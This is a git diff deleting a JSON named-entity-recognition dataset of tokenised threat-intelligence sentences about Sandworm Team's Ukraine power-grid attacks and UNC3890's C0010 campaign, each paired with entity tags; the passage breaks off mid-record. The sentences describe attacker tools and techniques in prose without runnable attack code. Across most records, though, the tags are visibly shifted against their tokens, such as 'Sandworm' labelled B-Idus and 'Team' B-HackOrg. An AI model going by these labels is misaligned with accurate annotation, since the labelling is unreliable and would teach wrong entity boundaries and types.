diff --git "a/labeled_cti_data.json" "b/labeled_cti_data.json" deleted file mode 100644--- "a/labeled_cti_data.json" +++ /dev/null @@ -1,552502 +0,0 @@ -[ - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "modified", - "in-registry", - "internet", - "settings", - "to", - "lower", - "internet", - "security." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "created", - "privileged", - "domain", - "accounts", - "to", - "be", - "used", - "for", - "further", - "exploitation", - "and", - "lateral", - "movement." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "installed", - "a", - "modified", - "Dropbear", - "SSH", - "client", - "as", - "the", - "backdoor", - "to", - "target", - "systems." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "vba_macro.exe", - "deletes", - "itself", - "after", - "`FONTCACHE.DAT`,", - "`rundll32.exe`,", - "and", - "the", - "associated", - ".lnk", - "file", - "is", - "delivered." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "O", - "B-OffAct", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "pushed", - "additional", - "malicious", - "tools", - "onto", - "an", - "infected", - "system", - "to", - "steal", - "user", - "credentials,", - "move", - "laterally,", - "and", - "destroy", - "data." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "gathered", - "account", - "credentials", - "via", - "a", - "BlackEnergy", - "keylogger", - "plugin." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "moved", - "their", - "tools", - "laterally", - "within", - "the", - "corporate", - "network", - "and", - "between", - "the", - "ICS", - "and", - "corporate", - "network." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "leveraged", - "Microsoft", - "Office", - "attachments", - "which", - "contained", - "malicious", - "macros", - "that", - "were", - "automatically", - "executed", - "once", - "the", - "user", - "permitted", - "them." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "I-OffAct", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "I-SamFile", - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "modified", - "in-registry", - "Internet", - "settings", - "to", - "lower", - "internet", - "security", - "before", - "launching", - "`rundll32.exe`,", - "which", - "in-turn", - "launches", - "the", - "malware", - "and", - "communicates", - "with", - "C2", - "servers", - "over", - "the", - "Internet.", - "." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "used", - "BlackEnergy’s", - "network", - "sniffer", - "module", - "to", - "discover", - "user", - "credentials", - "being", - "sent", - "over", - "the", - "network", - "between", - "the", - "local", - "LAN", - "and", - "the", - "power", - "grid’s", - "industrial", - "control", - "systems." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "loaded", - "BlackEnergy", - "into", - "svchost.exe,", - "which", - "then", - "launched", - "iexplore.exe", - "for", - "their", - "C2." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "remotely", - "discovered", - "systems", - "over", - "LAN", - "connections.", - "OT", - "systems", - "were", - "visible", - "from", - "the", - "IT", - "network", - "as", - "well,", - "giving", - "adversaries", - "the", - "ability", - "to", - "discover", - "operational", - "assets." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "O", - "B-OffAct", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "used", - "a", - "backdoor", - "which", - "could", - "execute", - "a", - "supplied", - "DLL", - "using", - "`rundll32.exe`." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "obtained", - "their", - "initial", - "foothold", - "into", - "many", - "IT", - "systems", - "using", - "Microsoft", - "Office", - "attachments", - "delivered", - "through", - "phishing", - "emails." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "I-OffAct", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "I-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "used", - "valid", - "accounts", - "on", - "the", - "corporate", - "network", - "to", - "escalate", - "privileges,", - "move", - "laterally,", - "and", - "establish", - "persistence", - "within", - "the", - "corporate", - "network." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "installed", - "a", - "VBA", - "script", - "called", - "`vba_macro.exe`.", - "This", - "macro", - "dropped", - "`FONTCACHE.DAT`,", - "the", - "primary", - "BlackEnergy", - "implant;", - "`rundll32.exe`,", - "for", - "executing", - "the", - "malware;", - "`NTUSER.log`,", - "an", - "empty", - "file;", - "and", - "desktop.ini,", - "the", - "default", - "file", - "used", - "to", - "determine", - "folder", - "displays", - "on", - "Windows", - "machines." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2015", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "used", - "BlackEnergy", - "to", - "communicate", - "between", - "compromised", - "hosts", - "and", - "their", - "command-and-control", - "servers", - "via", - "HTTP", - "post", - "requests." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "used", - "the", - "`sp_addlinkedsrvlogin`", - "command", - "in", - "MS-SQL", - "to", - "create", - "a", - "link", - "between", - "a", - "created", - "account", - "and", - "other", - "servers", - "in", - "the", - "network." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Purp", - "B-Features", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "used", - "a", - "script", - "to", - "attempt", - "RPC", - "authentication", - "against", - "a", - "number", - "of", - "hosts." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "used", - "a", - "trojanized", - "version", - "of", - "Windows", - "Notepad", - "to", - "add", - "a", - "layer", - "of", - "persistence", - "for", - "Industroyer." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "added", - "a", - "login", - "to", - "a", - "SQL", - "Server", - "with", - "`sp_addlinkedsrvlogin`." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "disabled", - "event", - "logging", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "I-OffAct", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "created", - "two", - "new", - "accounts,", - "“admin”", - "and", - "“система”", - "(System).", - "The", - "accounts", - "were", - "then", - "assigned", - "to", - "a", - "domain", - "matching", - "local", - "operation", - "and", - "were", - "delegated", - "new", - "privileges." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "O", - "B-OffAct", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "used", - "Mimikatz", - "to", - "capture", - "and", - "use", - "legitimate", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "used", - "`move`", - "to", - "transfer", - "files", - "to", - "a", - "network", - "share." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "masqueraded", - "executables", - "as", - "`.txt`", - "files." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "DLLs", - "and", - "EXEs", - "with", - "filenames", - "associated", - "with", - "common", - "electric", - "power", - "sector", - "protocols", - "were", - "used", - "to", - "masquerade", - "files." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "used", - "heavily", - "obfuscated", - "code", - "with", - "Industroyer", - "in", - "its", - "Windows", - "Notepad", - "backdoor." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "used", - "PowerShell", - "scripts", - "to", - "run", - "a", - "credential", - "harvesting", - "tool", - "in", - "memory", - "to", - "evade", - "defenses." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "checked", - "for", - "connectivity", - "to", - "resources", - "within", - "the", - "network", - "and", - "used", - "LDAP", - "to", - "query", - "Active", - "Directory,", - "discovering", - "information", - "about", - "computers", - "listed", - "in", - "AD." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "I-OffAct", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "utilized", - "`net", - "use`", - "to", - "connect", - "to", - "network", - "shares." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "used", - "various", - "MS-SQL", - "stored", - "procedures." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "I-OffAct", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "used", - "UPX", - "to", - "pack", - "a", - "copy", - "of", - "Mimikatz." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "created", - "VBScripts", - "to", - "run", - "on", - "an", - "SSH", - "server." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "used", - "the", - "`xp_cmdshell`", - "command", - "in", - "MS-SQL." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "I-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "WMI", - "in", - "scripts", - "were", - "used", - "for", - "remote", - "execution", - "and", - "system", - "surveys." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "I-OffAct", - "I-OffAct", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2016", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "used", - "an", - "arbitrary", - "system", - "service", - "to", - "load", - "at", - "system", - "boot", - "for", - "persistence", - "for", - "Industroyer.", - "They", - "also", - "replaced", - "the", - "ImagePath", - "registry", - "value", - "of", - "a", - "Windows", - "service", - "with", - "a", - "new", - "backdoor", - "binary." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2022", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "deployed", - "CaddyWiper", - "on", - "the", - "victim’s", - "IT", - "environment", - "systems", - "to", - "wipe", - "files", - "related", - "to", - "the", - "OT", - "capabilities,", - "along", - "with", - "mapped", - "drives,", - "and", - "physical", - "drive", - "partitions." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2022", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "leveraged", - "Group", - "Policy", - "Objects", - "(GPOs)", - "to", - "deploy", - "and", - "execute", - "malware." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "I-OffAct", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2022", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "used", - "a", - "Group", - "Policy", - "Object", - "(GPO)", - "to", - "copy", - "CaddyWiper's", - "executable", - "`msserver.exe`", - "from", - "a", - "staging", - "server", - "to", - "a", - "local", - "hard", - "drive", - "before", - "deployment." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2022", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "leveraged", - "Systemd", - "service", - "units", - "to", - "masquerade", - "GOGETTER", - "malware", - "as", - "legitimate", - "or", - "seemingly", - "legitimate", - "services." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "I-OffAct", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2022", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "proxied", - "C2", - "communications", - "within", - "a", - "TLS-based", - "tunnel." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "I-OffAct", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2022", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "utilized", - "a", - "PowerShell", - "utility", - "called", - "TANKTRAP", - "to", - "spread", - "and", - "launch", - "a", - "wiper", - "using", - "Windows", - "Group", - "Policy." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2022", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "deployed", - "the", - "GOGETTER", - "tunneler", - "software", - "to", - "establish", - "a", - "“Yamux”", - "TLS-based", - "C2", - "channel", - "with", - "an", - "external", - "server(s)." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "O", - "B-OffAct", - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2022", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "leveraged", - "Scheduled", - "Tasks", - "through", - "a", - "Group", - "Policy", - "Object", - "(GPO)", - "to", - "execute", - "CaddyWiper", - "at", - "a", - "predetermined", - "time." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "I-OffAct", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2022", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "configured", - "Systemd", - "to", - "maintain", - "persistence", - "of", - "GOGETTER,", - "specifying", - "the", - "`WantedBy=multi-user.target`", - "configuration", - "to", - "run", - "GOGETTER", - "when", - "the", - "system", - "begins", - "accepting", - "user", - "logins." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "O", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "2022", - "Ukraine", - "Electric", - "Power", - "Attack,", - "Sandworm", - "Team", - "deployed", - "the", - "Neo-REGEORG", - "webshell", - "on", - "an", - "internet-facing", - "server." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "B-Area", - "I-OffAct", - "I-OffAct", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0010,", - "UNC3890", - "actors", - "established", - "domains", - "that", - "appeared", - "to", - "be", - "legitimate", - "services", - "and", - "entities,", - "such", - "as", - "LinkedIn,", - "Facebook,", - "Office", - "365,", - "and", - "Pfizer." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-Org", - "I-Org", - "O", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "During", - "C0010,", - "UNC3890", - "actors", - "likely", - "compromised", - "the", - "domain", - "of", - "a", - "legitimate", - "Israeli", - "shipping", - "company." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "I-Org", - "O" - ] - }, - { - "tokens": [ - "During", - "C0010,", - "UNC3890", - "actors", - "likely", - "established", - "a", - "watering", - "hole", - "that", - "was", - "hosted", - "on", - "a", - "login", - "page", - "of", - "a", - "legitimate", - "Israeli", - "shipping", - "company", - "that", - "was", - "active", - "until", - "at", - "least", - "November", - "2021." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Time", - "O" - ] - }, - { - "tokens": [ - "For", - "C0010,", - "the", - "threat", - "actors", - "compromised", - "the", - "login", - "page", - "of", - "a", - "legitimate", - "Israeli", - "shipping", - "company", - "and", - "likely", - "established", - "a", - "watering", - "hole", - "that", - "collected", - "visitor", - "information." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0010,", - "UNC3890", - "actors", - "downloaded", - "tools", - "and", - "malware", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0010,", - "UNC3890", - "actors", - "used", - "unique", - "malware,", - "including", - "SUGARUSH", - "and", - "SUGARDUMP." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "For", - "C0010,", - "UNC3890", - "actors", - "obtained", - "multiple", - "publicly-available", - "tools,", - "including", - "METASPLOIT,", - "UNICORN,", - "and", - "NorthStar", - "C2." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "For", - "C0010,", - "UNC3890", - "actors", - "staged", - "malware", - "on", - "their", - "infrastructure", - "for", - "direct", - "download", - "onto", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0010,", - "UNC3890", - "actors", - "staged", - "tools", - "on", - "their", - "infrastructure", - "to", - "download", - "directly", - "onto", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - 